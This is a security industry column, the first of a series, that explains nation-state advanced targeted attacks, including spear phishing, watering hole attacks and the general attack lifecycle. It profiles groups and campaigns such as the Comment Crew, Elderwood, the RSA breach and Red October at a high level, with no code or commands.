Advanced Threat Protection & Visibility Series – Part 1: Advanced Threats and Nation States
Last year, Keith Alexander, the director of the National Security Agency, described cyber espionage as “the greatest transfer of wealth in history.” Now, cyber espionage has expanded its focus from military targets to mainstream corporate America—all in the form of Advanced Targeted Attacks (ATAs). Just last month, Mandiant’s APT1 report outlined in great detail how a unit of the People’s Liberation Army (PLA) has successfully stolen hundreds of terabytes of data from at least 141 organizations across 20 major industries since 2006.
In just the past few weeks, Bloomberg, the Wall Street Journal and the New York Times were penetrated by ATAs in a reconnaissance effort to find potentially damaging stories and the anonymous sources used to build them. These organizations joined an ever-increasing list of enterprise victims. Some of these enterprise attacks included the pilfering of big oil company networks by attackers seeking information on oil reserves; stolen intellectual property (IP) from California’s solar industry; the theft of sensitive client information from prominent law firms; the infiltration of nuclear power plants; stolen financial statements and executive leadership information from leading financial companies; and the theft and monitoring of user accounts from Twitter and Apple. Once ATAs gain a foothold in the network, they never leave. And—with current security tools—they are rarely ever detected.
About advanced targeted attacks
Advanced targeted attacks have multiple defining characteristics. They are methodical, persistent and data-focused attacks—launched by nation states or other bad actors with the objective of stealing information, not money. ATAs generally leverage one of two primary methods for initial infection, while also leveraging a distinct methodology. Let’s look at the two main methods of initial infection by ATAs:
Method 1: Targeted spear phishing attack
Originally, attackers used generic emails for phishing attacks—often recognized for their particularly poor use of grammar. Today, attackers are targeted and sophisticated, researching their phishing targets well and leveraging advanced social engineering techniques, including Web search results and social networks like Quora, Facebook and LinkedIn. They focus on people the attack recipient knows and trusts, as well as specific topics in which they are interested. Armed with this strategic knowledge, they craft and send their phishing email, including a timely and relevant title, so that it appears to come from a trusted party. Most often, the email contains either a malware-laden file (a Microsoft Office document or an Adobe PDF file) or a link to a malware laden website. Once opened, malware is automatically downloaded—opening a backdoor communication channel.
Method 2: Watering hole method
In the event a targeted spear phishing attack fails (due to employee security awareness), attackers often apply the watering hole method. With this method, attackers search for seemingly safe websites that employees are likely to visit. These sites are subsequently hacked, effectively serving malware to any and all targets who visit the site. Attackers can then distill the infected machines down to those targets in which they are most interested, discarding the rest. To date, watering hole targets have included websites for high schools, drag racing and curling clubs.
Methodology behind ATAs
Today’s ATAs employ a unique methodology for effective delivery and execution. Below is an outline of the most common methodology used in ATA attacks against both governments and corporations:
• Strategy and social engineering: Hackers put together a strategy focusing on what data they want, where it is likely to be, and who has access to it. They also consider likely defenses, building a comprehensive attack plan that begins with social engineering.
• Targeted email: A targeted malware-laden phishing email is crafted and sent to the victim.
• Email execution: The phishing email is executed by the victim, activating malware.
• Malware infiltration: Malware is installed on the infected device.
• Command and Control beachhead: The malware beacons to a Command and Control (C2) site and receives updated instructions.
• Opening of backdoor: Attackers enter the network and establish multiple backdoors to ensure continued access.
• Stealthy presence: Attackers use extreme stealth at this critical point, avoiding detection or triggering by IPS/IDS devices.
• Privilege escalation: Attackers then work to escalate privileges in order to gain elevated access to protected resources.
• Password access: Encrypted passwords are accessed and dumped from local machines and domain controllers. The passwords are subsequently cracked off-line by hackers.
• Administrator access: Hackers then return to mimic the organization’s own network administrators.
• Reconnaissance: Attackers perform reconnaissance to survey, classify and gather target data.
• Data exfiltration: Data is coalesced on a staging server and then exfiltrated from the network.
• Persistence: Attackers return regularly to gather, examine and exfiltrate new data.
Although the methodology has remained more or less the same, the technology used in executing ATAs has rapidly advanced. Many of the original attacks used commonly available remote access tools (RATs) to remotely control infected computers—especially Ghost RAT and Shady RAT. Google, for example, was one of the first companies to be targeted by ATAs—in what is now known as Operation Aurora. Meanwhile, the Night Dragon campaign targeted the oil and gas industry. By modern ATA standards, the malware used was primitive. However, in the recent attacks on U.S. media corporations, approximately 50 pieces of custom malware were used. And, new ATA platforms are emerging every day.
Who is behind ATAs?
Most ATA groups are believed to be backed by nation states, driven by the primary economic and geo-political goals of their countries. Generally, nation state ATAs are not directly financially motivated. However, the information that is targeted and stolen can most definitely lead its recipients to prodigious financial gains. One such example involves China’s Comment Crew (recently featured in Mandiant’s APT1 Report), who attacked Council of the European Union’s computers at the height of the Greek financial crisis in July 2011. Faced with a pending and critical decision by the European Union (EU), Greece’s debt would either be worthless or worth full face value. Armed with inside knowledge of the upcoming decision, a nation state could look to make a fortune purchasing Greek debt. Thus, prior to the public disclosure of the decision by the EU, the Comment Crew infiltrated the EU Council President’s email account. For multiple days, they monitored his account – creating a virtual wiretap on his activities and communications.
Based on what we know, there are approximately fifteen major, active ATA crews in operation. Of them, the Comment Crew is perhaps one of the most notorious and prolific groups. Also known as Byzantine Candor, the Comment Crew was the focus of Mandiant’s recent APT1 Report, in which they were identified as Unit 61398—part of China’s People’s Liberation Army (PLA). For years, the Comment Crew has focused on commercial targets, representing industries and verticals critical to China’s key economic interests. Their nickname is derived from their expertise in embedding malware commands in compromised websites, which are subsequently read and executed by infected machines deep within ‘secure’ corporate networks. To IT security teams, no sign of infection is seen. Rather, it appears only that a machine has called a Web page from a geographically local site (when, in reality, it has begun to communicate with a malicious C2 server). The Comment Crew very likely has hundreds—if not thousands—of employees. As such, it is beyond the reach of international law enforcement or arrest threats. Today, the Comment Crew is one of the most active nation state cyber threat groups in operation, stealing corporate and defense industry secrets worldwide.
Another well-known ATA group is the Elderwood Gang. Elderwood has been tied to Operation Aurora, as well as attacks on the Free Tibet movement. The Elderwood Group frequently compromises sites it disagrees with politically (e.g. Amnesty International), and employs the watering hole method to infect visitors to compromised sites. Elderwood has access to a large number of zero-day exploits, harvesting targeted information for site visitors. In general, the Elderwood gang focuses on attacking defense-related industries, as well as those entities involved in human rights. In January 2013, Elderwood hacked the website of the Council on Foreign Relations—using it to host an Internet Explorer zero-day exploit that attacked all site visitors. The Elderwood Gang is also believed to be based in China.
The breach of RSA’s SecurID technology in 2011 occurred when employees opened a malware-infected spreadsheet that they received via email. That breach cascaded into multiple attacks on U.S. Defense contractors, before costing RSA at least $66 million. Lockheed Martin, L-3 Communications and many others were targeted—all as a result of the fact that attackers could now bypass their multifactor access controls. The attackers used a program called HTran to hide their C2 servers. Although the group involved in the attack was never publicly named, it is generally known that the Comment Crew regularly uses HTran. It has also been reported that the recent attacks on U.S. media companies were executed in order to find the specific sources used by reporters to gain information on the wealth amassed by the families of China’s ruling elite.
Many other countries have been targeted, especially Japan, Russia, the United Kingdom and Germany. In January 2013, another data stealing ATA framework was uncovered—codename Red October. Rocra (e.g. the name of the malware used in the Red October campaign) has streamlined the data theft methodology of today’s advanced targeted attacks. The main purpose of Rocra appears to be the gathering of classified information and geopolitical intelligence. As such, it has specific modules for each of the elements needed for an ATA attack: malware infiltration, privilege escalation, reconnaissance gathering, persistence maintenance and data extraction and exfiltration. Rocra can even steal data from connected USB drives and iPhones. In the end, there is a vast amount of research and development going into today’s ATA platforms. And, the rewards for data theft are staggering; by stealing secrets, countries have leapfrogged over others countries with great success.
ATA Focus in 2013
The focus of attacks by the Comment Crew—and other ATA crews—is almost always on enterprise trade secrets or any classified information that can give nation states a competitive advantage. In today’s global market, nation states are focused on eroding the advantages of their competitors and adversaries. And, if identified as a stepping stone to their primary objectives, most any enterprise could be a target. Every day, multiple targets are being attacked across the financial, energy, media, high-tech, pharmaceutical, manufacturing, national defense, biotechnology and food industries.
As a result, proprietary information and intellectual property is being vacuumed up from U.S. companies at an unprecedented rate. Unfortunately, the rate is only increasing. As outlined in my last column, organizations must focus on preparing for the inevitability of ATAs. This includes gaining the security intelligence, visibility, content and context needed to reduce the window of opportunity for advanced malware and attacks. In the next column, we will investigate other network usurpers, while taking a closer look at the CRIME methodology for detecting and dealing with advanced threats on the network. The CRIME methodology includes: Context, Root Cause, Impact, Mitigation and Eradication of ATAs from our networks.